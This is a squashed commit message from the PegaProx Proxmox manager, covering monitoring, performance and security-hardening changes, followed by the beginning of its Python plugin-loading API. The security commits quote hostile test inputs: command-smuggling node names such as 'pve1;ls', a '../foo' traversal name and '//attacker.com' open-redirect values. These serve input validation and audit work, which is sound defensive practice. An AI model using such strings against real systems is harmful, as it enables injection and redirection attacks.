  - filesystems[]:  real used/total per mountpoint with used_pct,
                    mirrored from /guest-fsinfo so the detail panel
                    does one round-trip instead of two
  - users[]:        QGA get-users — logged-in sessions for security
                    context ("who's on this VM right now")
  - guest_time_ns:  guest clock in ns since epoch — ntp sanity check

Short-circuits on 500 + "not running" after the first call so an
agent-less VM doesn't burn 6 round-trips. Each block in its own
try/except so a single QGA quirk doesn't kill the whole payload.

Frontend: VM detail panel's Guest Agent section adds a <details>
expander below the existing summary table with three sub-blocks
(Filesystems / Interfaces / Users) plus a clock-skew line. Green /
yellow / red on FS fill > 75% / 90%, and on clock drift > 5s / 60s.

i18n: 35 new strings across DE/EN/FR/ES/PT/KO/IT for guestDetail,
loggedInUsers, clockSkew, filesystems, interfaces. The "users" key
already existed everywhere — left alone.

- MK (backend)
- LW (UI)

* monitoring: cluster-health panel (corosync rings + pvecm + services)

New /api/clusters/<id>/nodes/<n>/cluster-health endpoint SSHes the
node and runs:
  - corosync-cfgtool -s     → ring ID, address, status, node count
  - pvecm status            → quorate, votes, cluster name, config version
  - systemctl show <svc>    → ActiveState/SubState/since/Result for
                              pveproxy, pvedaemon, pve-cluster,
                              corosync, pvestatd

Each block in its own try/except so a single command failure doesn't
nuke the whole payload — operators chasing a half-broken cluster get
partial data instead of nothing. Errors surface via the standard
{error:...} shape we use for the other SSH-backed endpoints.

Frontend: Node detail → System tab now leads with a Cluster Health
panel:
  - quorum status (green if "Yes", red otherwise)
  - per-ring table with status colour
  - 5-card service grid with active/sub state + since timestamp
    coloured by ActiveState (green=active, yellow=in-between,
    red=failed)

i18n: 28 new strings across DE/EN/FR/ES/PT/KO/IT for clusterHealth,
quorum, corosyncRings, address, services, since etc. Several keys
(nodes, votes, clusterName, since) already existed and were left.

- MK (backend)
- LW (UI)

* monitoring: lm-sensors panel (temp / fan / volt)

New /api/clusters/<id>/nodes/<n>/sensors endpoint SSHes the node and
parses `sensors -j`. Flattens the lm-sensors JSON
({chip: {sensor: {tempN_input: ...}}}) into a list of
{chip, label, kind, value, max, crit, alarm} rows.

Frontend: Sensors card at the top of System tab, table with chip /
sensor / value / max / crit / alarm columns. Coloring:
  - value >= crit OR alarm flag  → red
  - value >= max                  → yellow
  - otherwise                     → default
Hidden on hosts without lm-sensors (returns error string the UI
skips rendering for).

i18n: 21 new strings across DE/EN/FR/ES/PT/KO/IT for sensors,
sensor, sensorsHint. The "value" key already existed and was left.

- MK (backend)
- LW (UI)

* monitoring: per-tag / per-pool rollups on Insights tab

New /api/clusters/<id>/insights/rollups?group_by=tag|pool endpoint
aggregates the cluster's VMs by tag or by Proxmox pool. Returns one
row per group with vm_count, running_count, summed cpu_percent,
mem_used/max + pct, disk_used/max + pct, cumulative disk + net I/O
bytes.

VMs with multiple tags count in EVERY tag's rollup — that's the
useful semantic (the 'prod' tag should include VMs also tagged
'critical'). VMs with no tag fall into '(untagged)'. Pool grouping
gives VMs without a pool the '(no pool)' bucket.

Frontend: Insights tab gets a Rollups card between Top Talkers and
Right-sizing, with By-Tag/By-Pool selector. Table shows group key,
VM count + running count, Σ CPU%, RAM%/Disk% (with absolute
bytes on hover via title attr), cumulative net I/O.

i18n: 49 new strings (~7 keys × 7 langs) for rollups, byTag, byPool,
noGroupings, rollupsHint. The "tag", "pool", "tags", "running" keys
already existed across langs and were left untouched.

- MK (backend)
- LW (UI)

* monitoring: include Top Talkers + Rollups in Insights PDF export

The two cards (75f6e58 Top Talkers, 953d38d Rollups) showed up on
the Insights tab but the "Export PDF" button still only printed
Capacity Forecast + Right-sizing. Now exports four sections:

  1. Capacity Forecast (linear-reg ETA per metric)   - existing
  2. Top Talkers — uses the metric the user has open  - NEW
                   in the dropdown when they hit Export
  3. Rollups     — uses By-Tag / By-Pool depending    - NEW
                   on the user's current group_by toggle
  4. Right-sizing recommendations                     - existing

Subtitle now reads "Capacity Forecast · Top Talkers · Rollups ·
Right-sizing" so the printed report's header reflects all four.
Empty sections are skipped (e.g. no rollups data → block isn't
added).

Same WinAnsi-safe sanitizer the existing blocks use; bytes are
formatted via a local fmtBytesPdf so the PDF columns stay
narrow.

- MK (PDF block builders)
- LW (column shape + i18n keys reuse)

* security: defense-in-depth on monitoring endpoints (node-name + rollups cap)

Two findings from a focused audit of this week's monitoring expansion.
Neither has a known live exploit — both are defense-in-depth.

(1) Node-name validation on /netstats, /cluster-health, /sensors
    These three new SSH-fronted endpoints take `node` from the URL
    and pass it into _get_node_ip(node), which interpolates into a
    PVE API URL. The SSH command strings themselves are static so
    shell-injection is already closed, but a crafted node like
    `pve1;ls` or `pve1$(...)` would still flow into the PVE URL
    construction and into log lines. Same vector vms.py:2718
    closed back in April with a strict RFC-1035-ish regex. New
    helper _reject_bad_node() applies the identical pattern at
    each route entry.

(2) Rollups response capped at 500 groups
    /insights/rollups returned one row per distinct tag (or pool)
    with no upper bound. A fleet with thousands of distinct tags
    (admin-driven or via a clumsy bulk-tag script) could return an
    unbounded payload. Added ?limit=N with clamp [1, 500] default
    100, sorted by vm_count desc so the densest groups are kept.
    Response now also carries `truncated: bool` so the UI can
    show "showing X of Y" once we wire it.

Verified live against localhost:5000:
  /nodes/pve1;ls/sensors        → 400 Invalid node name
  /nodes/1pve/cluster-health    → 400 Invalid node name (digit-led)
  /nodes/pve1/netstats          → 502 graceful (SSH key missing in dev)
  /insights/rollups?limit=1000  → clamped to limit=500

- MK

* perf: gevent-pool truthy bugfix + parallelise cluster-health + workers cap

(A) — CRITICAL existing bug in run_concurrent
gevent.pool.Pool overrides __bool__ to len(), so an empty pool is
falsy. The check `if GEVENT_POOL and GEVENT_AVAILABLE` in the
parallelisation helper was always-False on entry — every call
silently fell through to the sequential branch since day one.
The "5x faster dashboard" comment over the helper was aspiration,
not reality. Fix: `is not None`. Both copies (utils/concurrent.py
+ the duplicate at core/manager.py:74) get the same fix.

Isolated smoke against the helper:
  before: 7 × gevent.sleep(0.5) → 3.5s wall (sequential)
  after:  7 × gevent.sleep(0.5) → 0.5s wall (parallel) ✓

NOTE — there are 4 callsites in manager.py (1289, 1701, 11081,
15051) wrapping run_concurrent in their own
`if GEVENT_AVAILABLE and GEVENT_POOL:` check with the same bug.
Those have been sequential by accident; left as-is for now
since flipping them parallel could surface latent races in the
called code. Tracked for a focused follow-up.

(B) — F5: parallelise get_node_cluster_health 7 SSH calls
corosync-cfgtool + pvecm + 5x systemctl ran sequentially at 8s
per timeout = up to 56s blocking one gevent worker. Now spawned
via run_concurrent_dict with 12s overall cap.

Parser bugfix while in there: corosync-cfgtool uses `key = value`
not `key: value`, so the status field was being stored as
"status = active" verbatim. `addr =` was already handled with the
right split; extended the same pattern to status.

(C) — F3: PEGAPROX_WORKERS default cap 8 -> 16
With (A) making fanouts actually parallel, the bottleneck shifts
to worker count when /health + /vms-backup-status + dashboard
refresh fire concurrently. 16 raises the ceiling; PEGAPROX_WORKERS
env var still wins.

- MK

* perf: parallelise /health + /vms-backup-status fanouts (F1)

Both endpoints were sequential per-node fanouts that pinned a
gevent worker for 10+ seconds per call. They're dashboard-polled
every 10-20s, so they were the main reason a 4-worker default
chewed up the pool and starved SSE during peak load.

F1a — /health storage scan
  for node in ns.keys(): mgr.get_storage_list(node)
  → run_concurrent_dict({node: lambda: mgr.get_storage_list(node)})
  Only ONLINE nodes scanned (n.status in {online, running}) — dead
  nodes would otherwise park joinall at the full timeout; sequential
  code happened to mask this because per-call connect-fail was fast,
  parallel waits the slowest. Net would have been WORSE without
  this filter on degraded clusters.

F1b — /vms-backup-status PBS + PVE scan
  Both nested loops were sequential. Refactored into:
    1) per-PBS task = scan one PBS server's datastores + snapshots
       → list of (vmid, ts, encrypted, verified_ts) tuples
    2) per-node task = scan one PVE node's backup-content
       → same tuple shape
    3) run_concurrent_dict over all tasks (timeout 8s)
    4) sequentially _bump from results into by_vm
  Separating I/O (parallel) from state mutation (sequential)
  avoids needing a lock around the shared by_vm dict.
  Also filters to ONLINE nodes only.

E2E live timing on dev (one connected cluster, one dead corosync
member dragging /nodes calls):

  /vms-backup-status: 10.4s → 0.45s  (22× faster) ✓
  /health:            10.5s → 16s    (mixed — F1a portion works,
                                       remaining 16s is upstream
                                       get_node_status() blocking
                                       2× 10s on the dead member.
                                       That's pre-existing
                                       _get_node_ip behaviour, not
                                       introduced by this commit.
                                       Healthy clusters will see
                                       the full storage-fanout win.)

Both endpoints' response shapes verified unchanged.

- MK

* perf: fix last inline GEVENT_POOL truthy-check (manager.py:1294)

Paired with the run_concurrent helper bugfix in 8af4a2d. Of the
4 callsites that wrap fanouts in their own
`if GEVENT_AVAILABLE and GEVENT_POOL:` check, only this one
(get_cluster_status_summary's per-node fetch_node_details fanout)
had the inline check too — the other 3 (1701, 11081, 15051)
call run_concurrent directly, so the helper fix already wired
them up parallel.

Fanout callbacks here are pure PVE-API reads returning tuples;
shared-state writes happen sequentially after joinall under the
ip-cache lock. Race-safe by design — confirmed by code review
of all 4 sites before flipping.

E2E live timing on the dev env:
  /health  16s → 8s     — get_node_status fanout now parallel
  /vms-backup-status    — stayed at ~450ms (F1b already had it)

Plus a comprehensive 32-check E2E self-test ran clean:
  auth + cluster basics + 7 pre-existing endpoints (regression)
  + all 5 top-talkers metrics + both rollups grouping + limit
  clamp + security gates (400 on bad node-name) + 3 monitoring
  endpoints + 4 shape-preservation checks. 32 passed, 0 failed.

- MK

* security: defense-in-depth on today's perf commits

Re-audit of 8af4a2d / 9d2f925 / 5b51da2 / a79d2eb. No live exploit
found but two belt-and-suspenders hardenings worth landing:

(D1) get_node_cluster_health — shlex.quote the svc name before
   interpolating into the systemctl shell command sent over SSH.
   SERVICES is a hardcoded allow-list today so injection isn't
   reachable now, but if the list ever moves into config/runtime
   the un-quoted f-string would be RCE on the PVE node. Quote
   makes the call site future-proof regardless of where the
   value comes from.

(D2) PVE-returned node + storage names get the RFC-1035-ish regex
   check at the boundary before flowing into URL paths. PVE itself
   controls these but if PVE were ever compromised, a crafted name
   like `../foo` would let it pivot into other PVE namespaces.
   Mirrors api/nodes.py:_NODE_NAME_RE that we already apply on
   user-supplied node names. Applied at three sites:
     - clusters.py /health storage fanout (F1a)
     - pbs.py /vms-backup-status _scan_node (F1b)
     - pbs.py _scan_node store_name (F1b inner loop)

Verified live against localhost:5000 (one connected cluster, one
dead corosync member). 18-check sweep ran clean: cluster-health
still returns the same 5 services with identical names after
shlex.quote(); /health still scores the same 2 healthy factors
(nodes + storage) after the regex filter — no over-restriction.
All top-talkers metrics, both rollups groupings, and 5 pre-existing
endpoints still respond 200.

- MK

* perf: workers = max(8, cpu_count*4) + actually plumb the pool

Two fixes in one — PEGAPROX_WORKERS was a startup-log lie before:

(A) Lie label exposed
   `_start_gevent_server` printed
     "Starting PegaProx with Gevent WSGIServer (N greenlets)"
   but the `workers` value was NEVER passed to WSGIServer's
   `spawn=` parameter. gevent.pywsgi defaults to unlimited
   greenlets when spawn is unset — so the previous `min(cpu*2, 8)`
   / `min(cpu*2, 16)` defaults capped nothing in practice. F3
   from 8af4a2d only changed the log message.
   Fixed: server_kwargs['spawn'] = Pool(workers). Per-request
   handler greenlets are now actually capped; per-request
   fanouts (storage scan, PBS scan, SSH calls) still spawn
   inside their own request handler as before.

(B) Auto-scale formula
   Old:  min(cpu_count*2, 16)   — capped huge customer boxes at 16
   New:  max(8, cpu_count*4)    — proper CPU-driven scaling
       1c VM:    8 workers   (floor for tiny VMs)
       4c:      16 workers   (= old default on this size)
       8c:      32 workers
       12c:     48 workers   (verified live on this dev box)
       32c:    128 workers
       64c:    256 workers
   gevent greenlets are KB-stack-cheap so 100s per host are fine.
   PEGAPROX_WORKERS env override still wins.

Verified live on a 12-core dev box:
  Startup log: "12 CPU cores detected ... 48 greenlets"  ✓
  20 parallel curl -> /tasks completed in 48ms wall      ✓
  /auth/check + /health still respond 200                ✓

- MK

* security: defense-in-depth audit pass 3 — three findings closed

Whole-codebase sweep beyond the perf-commit follow-up. Three real
issues surfaced.

(1) MIGRATE-SQL — v0.9.10.1 half-applied hotfix
  v0.9.10.1 added _safe_quote_ident() and applied it to
  _row_counts_encrypted (line 280). _row_counts_plain at line 262
  was missed — same f-string-table-name-into-SELECT pattern. Now
  routed through the same whitelist+quote helper. Threat model is
  restore-from-untrusted-backup; exploitability nil in normal use,
  defense-in-depth no-go regardless.

(2) OPEN-REDIRECT — OIDC redirect_after
  `request.args.get('redirect_after').startswith('/')` accepted
  `//attacker.com` (protocol-relative URL) which the browser
  resolves as offsite. Same bug in the frontend client at
  web/src/auth.js. New _safe_internal_path() requires single
  leading /, rejects // and /\\, rejects CR/LF/TAB/backslash,
  caps length at 200. Mirrored client-side. Net: redirect_after
  is now strictly an internal SPA route.

(3) MASS-ASSIGNMENT — PBS notification create/update
  create_notification_target / update_notification_target /
  create_notification_matcher / update_notification_matcher all
  pumped `**kwargs` straight into PBS API body. An admin with
  notification-manage perm could inject arbitrary field names
  PBS might silently store in /etc/proxmox-backup/notifications.cfg.
  New _sanitize_pbs_kwargs whitelist filters by:
    - key matches ^[a-z][a-z0-9-]{0,30}$ (PBS/PVE convention)
    - value is str/int/bool or None
    - lists of scalars allowed (PBS array-as-CSV pattern)
  Forward-compatible with new PBS fields. The traffic_control
  CRUD methods below already had explicit per-field whitelisting;
  this brings notifications inline.

E2E verified via unit-smoke against both helpers:
  _sanitize_pbs_kwargs: 8 assertions (legitimate / control-char /
    uppercase / dict-value / dunder-prefix / over-30-char / list-
    scalars / list-with-object). ALL pass.
  _safe_internal_path: 6 assertions (valid / //attacker /
    /\\evil / CRLF / non-string / too-long). ALL pass.

What was confirmed clean (no fix needed): session cookies have
Secure+HttpOnly+SameSite; key files chmod 0600 on write; OIDC URL
goes through sanitize_outbound_url; audit-search has limit/offset
clamps; no plaintext secrets in logging calls. Documented in the
log so the next audit pass doesn't re-investigate these.

Outstanding (parked, not addressed in this commit):
  - ~24 sites returning raw `str(e)` to client — should go through
    safe_error(). Big refactor, separate pass.
  - OIDC verify_iss=False — documented behaviour, audience claim
    check still active; recommend in-code comment clarifying the
    accept-all-issuer policy.

- MK

* security: route all client error responses through safe_error()

The defense-in-depth audit (5929e01) parked 24 sites returning raw
str(e) to the client as a known info-leak surface. This commit
closes that pass — 25 sites total across 11 files, including the
ceph.py rbd-SSH tuple-return path I missed in the original audit
count.

Pattern was:
    return jsonify({'error': str(e)}), 500
which leaks stack-trace fragments, internal paths, library
internals (paramiko exceptions, sqlite errors, PVE error bodies)
straight back to whoever hit the endpoint. safe_error() in
api/helpers.py logs the full exception via logging.error(exc_info)
and returns a generic message to the client. Operators still get
the trace in pegaprox.log.

Per-file count + import added where missing:

  pbs.py        5 sites   (existing safe_error refs)
  push.py       5 sites   + import added
  vms.py        5 sites   (incl. 2 f-string variants:
                          "SSH error: {str(e)}" and
                          "Connection failed: {str(e)}" —
                          rerouted with default_msg arg)
  users.py      3 sites   (user-folder CRUD)
  ceph.py       1 site    (rbd-SSH tuple-return at line 147)
  alerts.py     2 sites   (one was missed by an earlier scan)
  insights.py   1 site    + import expanded
  plugins.py    1 site    + import added
  clusters.py   1 site
  settings.py   1 site    (status-page plugin proxy)
  storage.py    1 site    (storage identity passthrough)

Total: 25 sites cleaned, 0 raw str(e) returns left in pegaprox/api/
or pegaprox/background/ (verified by re-running the audit grep).

E2E sweep on the running dev server: 12/12 endpoints across the
11 touched files responded 200 OK after refactor. No regression
in response shape — only the exception-message field is
generalised.

Outstanding: OIDC verify_iss=False still wants a code-comment
clarifying the accept-all-issuer policy. Pure documentation,
separate commit.

- MK

* sse: stability — json default=str + reconnect-log backoff

Two thin failure modes I spotted while auditing the SSE plumbing
for "why does it sometimes die" — both small, both real, both
target observability/durability rather than throughput.

(1) broadcast_sse json.dumps without default=
   A caller passing a datetime / set / bytes / custom-object in
   `data` would raise TypeError inside json.dumps, get swallowed
   by the outer try/except, and the broadcast would silently
   disappear — no log, no signal to operators. That's exactly the
   shape of the #413 layer 1 bug (wrong arg shape killed the
   publisher) just with a different trigger. Now:
     - json.dumps gets default=str so common Python objects coerce
     - inner try/except logs the update_type + cluster_id + error
       so the next time a caller breaks, ops can find it fast
   Smoke-tested with datetime/set/bytes (survived) and a custom
   __str__-raises object (logged + dropped, broadcaster healthy).

(2) reconnect-log INFO spam
   A dead cluster generated an INFO entry every 10s
   ("is disconnected, attempting reconnect...") → ~360 INFO
   entries per hour per dead cluster. Operators watching the
   log for actual events got drowned out. Now backoff: INFO on
   attempt #1 + every 50th (~8min cadence) for ongoing
   visibility; DEBUG in between. Reconnect cadence itself is
   unchanged at 10s. Successful-reconnect line stays INFO with
   "after N attempts" so it's clear how long the outage was.
   `_reconnect_attempt_count` resets to 0 on reconnect success.

Not addressed (deliberately scoped out):
  - _vmw_watched memory: false alarm, self-trims at 2min idle
  - Per-client put_nowait drop visibility: nice-to-have, not on
    today's path
  - Per-cluster threading.Thread spawn per loop: gevent monkey-
    patches to a greenlet so it's cheap; not a real bottleneck

E2E verified: server restarted clean, SSE stream opened via
/api/sse/token then /api/sse/updates?token=<t>, received
'connected' + live 'tasks' events for both connected clusters.
No regression to broadcaster cadence.

- MK

* sse: shrink dark-window after cluster reconnect (target <30s SLA)

Two-part tightening of the recover-to-UI-visible window so a
cluster (or single node) coming back online surfaces in the
dashboard within a worst-case ~30s instead of drifting toward
60s+.

(1) On successful connect_to_proxmox(), push a fresh metrics
    broadcast immediately + clear any pending _sse_cooldown_until.
    Previously the reconnected cluster waited up to one full
    broadcast-loop tick (1s) plus any pre-existing cooldown
    before the UI flipped to "online" — even though the
    connection was already back. Now: reconnect → metrics
    pushed in the same iteration.

(2) Error-cooldown 15s → 10s on get_tasks / get_node_status
    failure paths. Cooldown gates broadcasts while a host is
    flaky, so a 15s cooldown means up to 15s of dark UI per
    cycle. On a marginally-recovering cluster that hits two
    cooldown cycles in a row, dark-window stretches to 30s.
    With 10s the worst-case two-cycle stretch is 20s, leaving
    comfortable headroom under a 30s SLA.

Combined with the existing 10s reconnect-retry cadence + 1s
broadcast loop, the recovery story is now:
  - healthy cluster, single node bounces: UI sees green within
    1-2s (per-loop get_node_status broadcast)
  - cluster TCP-unreachable, returns within seconds: UI sees
    green within 10-20s (reconnect retry + fresh-metrics push)
  - cluster slow-recovering (multiple cooldown cycles before
    stable): worst case ~30s

Per-cluster fan-out via threading.Thread (gevent-patched to
greenlet) still has the 8s join-timeout, so one slow cluster
can't drag the others.

E2E note: dev cluster came back clean after restart; SSE
stream open, heartbeat + tasks events flowing. No regression
to the broadcaster cadence or shape.

- MK

* docs: clarify why OIDC verify_iss is intentionally False

Last finding from the defense-in-depth audit pass (5929e01 noted
this as a follow-up). Pure documentation — no logic change.

`verify_iss=False` in the pyjwt.decode call has been flagged by
multiple SAST scanners as a missing claim check. It is intentional:

  - Real-world IdPs return inconsistent `iss` values relative to
    the operator-configured authority URL (trailing slash, host
    vs FQDN, http vs https on internal IdPs).
  - Signature verification ALREADY binds the token to the
    configured authority — `signing_key` is fetched from the
    JWKS endpoint at that authority, so a token signed elsewhere
    fails before any claim is read.
  - `verify_aud=True` + `audience=accepted` keeps audience-claim
    binding.
  - Nonce check on the next line covers replay.

The next person reading this code (or running SAST) shouldn't
have to re-derive the same conclusion or accidentally flip it
to True and break Authentik/Keycloak/Entra logins.

- MK

* release: bump build date 2026.05.30 → 2026.05.31

The version-bump landed yesterday but 23 commits worth of monitoring
expansion + perf hardening + defense-in-depth + safe_error refactor
+ SSE-stability + OIDC doc went on top today. Update build date so
the snapshot accurately reflects "this is the May 31 release-prep".

Version itself (0.9.12.0) unchanged.

- MK

* fix(cluster-health): hide 5 empty '?' service cards when SSH unavailable

Nico's eyeball test on Testing today: Cluster Health panel rendered
the 5 PVE services (pveproxy / pvedaemon / pve-cluster / corosync /
pvestatd) each with "?" as ActiveState because the dev-env's
PegaProx user has no SSH key to the PVE nodes. Visual noise that
looked like a half-broken integration.

Backend (core/manager.py get_node_cluster_health):
  After running the 7 SSH calls via run_concurrent_dict, set
  ssh_unavailable=True if EVERY block came back empty:
    corosync is None AND pvecm is None AND every service.active is None.
  The 5-row services array stays for shape compatibility — UI
  decides what to do with it.

Frontend (node_modals.js):
  If ssh_unavailable: render a single italic explainer:
    "Cluster Health needs SSH access to the node from PegaProx
     (corosync-cfgtool, pvecm, systemctl). Configure the cluster's
     Node-Shell SSH credentials and refresh."
  Otherwise: render the data we have. The services grid now also
  filters out rows where active is null (defensive — won't show
  '?' cards even on partial SSH success).

i18n: clusterHealthSshMissing in DE/EN/FR/ES/PT/KO/IT (7 strings).

E2E verified on dev (no SSH key): /cluster-health now returns
ssh_unavailable=true. UI explainer visible instead of '?' cards.
In customer installs with Node-Shell credentials configured this
flag stays false and the original data layout renders unchanged.

- MK

---------

Co-authored-by: mkellermann97 <marcus.kellermann@pegaprox.com>
Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>
Co-authored-by: Florian Paul Azim Hoberg <florian.hoberg@credativ.de>
Co-authored-by: gyptazy <4150400+gyptazy@users.noreply.github.com>
Co-authored-by: Davin Kevin <davin.kevin@gmail.com>
2026-05-31 21:26:49 +02:00

510 lines
20 KiB
Python

# -*- coding: utf-8 -*-
"""
PegaProx Plugin Management API - Layer 6
NS: Mar 2026 - auto-discover plugins from plugins/ dir, enable/disable via Settings
Plugins register route handlers via register_plugin_route() which are dispatched
through a single catch-all Flask route. This avoids Flask's restriction on
registering blueprints after the first request — plugins can be loaded at runtime.
"""
import json
import re
import sys
import threading
import logging
import importlib.util
from pathlib import Path
from datetime import datetime
from flask import Blueprint, jsonify, request, current_app
from pegaprox.constants import PLUGINS_DIR
from pegaprox.globals import *
from pegaprox.models.permissions import ROLE_ADMIN
from pegaprox.core.db import get_db
from pegaprox.utils.auth import require_auth
from pegaprox.utils.audit import log_audit
from pegaprox.api.helpers import safe_error
bp = Blueprint('plugins', __name__)
# NS May 2026 (#381 pentest) — strict path-segment whitelist for frontend_route
# values. One segment between slashes; alphanumerics + . _ - only.
_SAFE_PATH_SEG = re.compile(r'^[A-Za-z0-9_.-]+$')
# in-memory registries — guarded by _plugin_lock to prevent
# "dictionary changed size during iteration" crashes that made plugins
# appear to vanish under load (several users reported this).
_plugin_lock = threading.RLock()
_loaded_plugins = {} # {plugin_id: module}
_plugin_routes = {} # {plugin_id: {path: handler_fn}}
# NS Apr 2026 — CodeQL flagged plugin_id as a path-injection vector (admin-only
# endpoints but still). Every endpoint below now passes plugin_id through this
# validator before touching the filesystem. Allowed chars match what
# `_discover_plugins` accepts — directory-name-safe ASCII only, no dots.
import re as _re
_PLUGIN_ID_RE = _re.compile(r'^[a-z0-9][a-z0-9_-]{0,63}$')
def _valid_plugin_id(pid):
return isinstance(pid, str) and bool(_PLUGIN_ID_RE.match(pid))
# ---- Plugin Route Registration (used by plugins) ----
def register_plugin_route(plugin_id, path, handler):
"""Register a route handler for a plugin. Called from plugin's register() function."""
with _plugin_lock:
_plugin_routes.setdefault(plugin_id, {})[path] = handler
# ---- Catch-all route for plugin API calls ----
@bp.route('/api/plugins/<plugin_id>/api/<path:subpath>', methods=['GET', 'POST', 'PUT', 'DELETE'])
@require_auth(perms=['plugins.view'])
def plugin_proxy(plugin_id, subpath):
"""Dispatch API requests to loaded plugins"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
with _plugin_lock:
if plugin_id not in _loaded_plugins:
return jsonify({'error': 'Plugin not loaded'}), 404
handler = _plugin_routes.get(plugin_id, {}).get(subpath)
if not handler:
return jsonify({'error': f'Route not found: {subpath}'}), 404
try:
result = handler()
if isinstance(result, dict) or isinstance(result, list):
return jsonify(result)
return result
except Exception as e:
logging.error(f"[PLUGINS] {plugin_id}/{subpath} error: {e}")
return jsonify({'error': 'Plugin request failed'}), 500
# ---- Discovery & State ----
def _discover_plugins():
"""Scan plugins/ dir for subfolders with manifest.json"""
found = []
plugins_path = Path(PLUGINS_DIR)
if not plugins_path.exists():
return found
for d in sorted(plugins_path.iterdir()):
if not d.is_dir() or d.name.startswith(('_', '.')):
continue
manifest_file = d / 'manifest.json'
if not manifest_file.exists():
continue
try:
with open(manifest_file, 'r') as f:
meta = json.load(f)
meta['_id'] = d.name
meta['_dir'] = str(d)
meta['_has_init'] = (d / '__init__.py').exists()
found.append(meta)
except Exception as e:
logging.warning(f"[PLUGINS] Bad manifest in {d.name}: {e}")
found.append({
'_id': d.name, '_dir': str(d), '_has_init': False,
'name': d.name, 'error': f'Invalid manifest: {e}'
})
return found
def _get_plugin_states():
db = get_db()
rows = db.query('SELECT plugin_id, enabled, loaded_at, error FROM plugin_state') or []
return {r['plugin_id']: dict(r) for r in rows}
def _set_plugin_state(plugin_id, enabled, error=''):
db = get_db()
now = datetime.now().isoformat()
existing = db.query_one('SELECT plugin_id FROM plugin_state WHERE plugin_id = ?', (plugin_id,))
if existing:
db.execute('UPDATE plugin_state SET enabled = ?, loaded_at = ?, error = ? WHERE plugin_id = ?',
(1 if enabled else 0, now, error, plugin_id))
else:
db.execute('INSERT INTO plugin_state (plugin_id, enabled, loaded_at, error) VALUES (?, ?, ?, ?)',
(plugin_id, 1 if enabled else 0, now, error))
# ---- Loading ----
def load_plugin(app, plugin_id):
"""Load a plugin module and call its register() function
WARNING: Plugins execute arbitrary Python with full process privileges.
Only load plugins from trusted sources. There is no sandbox.
NS Apr 2026: idempotent — if already loaded, return success without re-registering."""
# NS May 2026 (Aikido SAST hardening) — defense-in-depth on plugin_id.
# All API entry points already validate via _valid_plugin_id, but if a
# future caller bypasses that we still refuse a path-traversal name here.
if not _valid_plugin_id(plugin_id):
return False, 'Invalid plugin id'
# idempotency — re-enable clicks used to double-register routes
with _plugin_lock:
if plugin_id in _loaded_plugins:
return True, ''
plugins_root = Path(PLUGINS_DIR).resolve()
plugin_dir = (plugins_root / plugin_id).resolve()
# belt + suspenders: ensure resolved path is still under plugins/.
try:
plugin_dir.relative_to(plugins_root)
except ValueError:
return False, 'Plugin path escapes plugins root'
init_file = plugin_dir / '__init__.py'
if not init_file.exists():
return False, 'No __init__.py found'
# NS: check manifest for trusted flag — warn if missing
manifest_path = plugin_dir / 'manifest.json'
is_trusted = False
if manifest_path.exists():
try:
with open(manifest_path) as f:
manifest = json.load(f)
is_trusted = manifest.get('author', '').startswith('PegaProx')
except Exception:
pass
if not is_trusted:
logging.warning(f"[PLUGINS] [SECURITY] Loading UNTRUSTED plugin '{plugin_id}' — not authored by PegaProx Team. Review code before use!")
# MK: Apr 2026 — security audit: plugins run with FULL process privileges, no sandbox
# this is by design (like Grafana/Jenkins plugins) but must be documented
from pegaprox.utils.audit import log_audit
try: log_audit('system', 'plugin.load', f"Plugin '{plugin_id}' loaded (trusted={is_trusted})")
except: pass
try:
mod_name = f'plugins.{plugin_id}'
spec = importlib.util.spec_from_file_location(mod_name, init_file)
mod = importlib.util.module_from_spec(spec)
sys.modules[mod_name] = mod
spec.loader.exec_module(mod)
# plugin calls register_plugin_route() inside register()
if hasattr(mod, 'register'):
mod.register(app)
with _plugin_lock:
_loaded_plugins[plugin_id] = mod
logging.info(f"[PLUGINS] Loaded: {plugin_id}")
return True, ''
except Exception as e:
logging.error(f"[PLUGINS] Failed to load {plugin_id}: {e}")
# roll back partial state — a register() that half-succeeded can leave
# stale routes referencing a module we're about to drop
with _plugin_lock:
_plugin_routes.pop(plugin_id, None)
_loaded_plugins.pop(plugin_id, None)
if f'plugins.{plugin_id}' in sys.modules:
del sys.modules[f'plugins.{plugin_id}']
return False, str(e)
def unload_plugin(plugin_id):
"""Unload a plugin — remove routes and module"""
with _plugin_lock:
_plugin_routes.pop(plugin_id, None)
_loaded_plugins.pop(plugin_id, None)
mod_name = f'plugins.{plugin_id}'
if mod_name in sys.modules:
del sys.modules[mod_name]
logging.info(f"[PLUGINS] Unloaded: {plugin_id}")
def load_enabled_plugins(app):
"""Called once at startup — load all enabled plugins"""
states = _get_plugin_states()
discovered = _discover_plugins()
loaded = []
for plugin in discovered:
pid = plugin['_id']
state = states.get(pid, {})
if state.get('enabled'):
ok, err = load_plugin(app, pid)
if ok:
loaded.append(plugin.get('name', pid))
# clear any old error from the DB
_set_plugin_state(pid, True, error='')
else:
# keep enabled flag so user still sees the intent, record error for UI
_set_plugin_state(pid, True, error=err)
if loaded:
logging.info(f"[PLUGINS] {len(loaded)} plugin(s) loaded: {', '.join(loaded)}")
def start_plugin_backgrounds():
# snapshot under lock to avoid "dictionary changed size during iteration"
with _plugin_lock:
plugins_snapshot = list(_loaded_plugins.items())
for pid, mod in plugins_snapshot:
if hasattr(mod, 'start_background_tasks'):
try:
mod.start_background_tasks()
logging.info(f"[PLUGINS] Background tasks started for {pid}")
except Exception as e:
logging.error(f"[PLUGINS] Background task failed for {pid}: {e}")
# ---- API Routes ----
@bp.route('/api/plugins', methods=['GET'])
@require_auth(perms=['plugins.view'])
def list_plugins():
"""List all discovered plugins with their enabled/disabled state"""
discovered = _discover_plugins()
states = _get_plugin_states()
result = []
# snapshot the registries so the list is consistent even if enable/disable runs mid-request
with _plugin_lock:
loaded_snapshot = set(_loaded_plugins.keys())
routes_snapshot = {k: list(v.keys()) for k, v in _plugin_routes.items()}
for plugin in discovered:
pid = plugin['_id']
state = states.get(pid, {})
# NS May 2026 (#381) — surface the manifest's frontend hook so the
# dashboard can build a plugin tab without core changes per plugin.
# Sanitize: route must be a string starting with /api/plugins/<pid>/
# so a malicious manifest can't redirect the iframe to an external host.
has_frontend = bool(plugin.get('has_frontend', False))
raw_route = plugin.get('frontend_route', '')
frontend_route = ''
# NS May 2026 (#381) — strict route validation. Accept either:
# 1. fully-qualified plugin path: /api/plugins/<pid>/api/...
# 2. pure relative form: 'ui' or 'admin/dash' → scoped under us
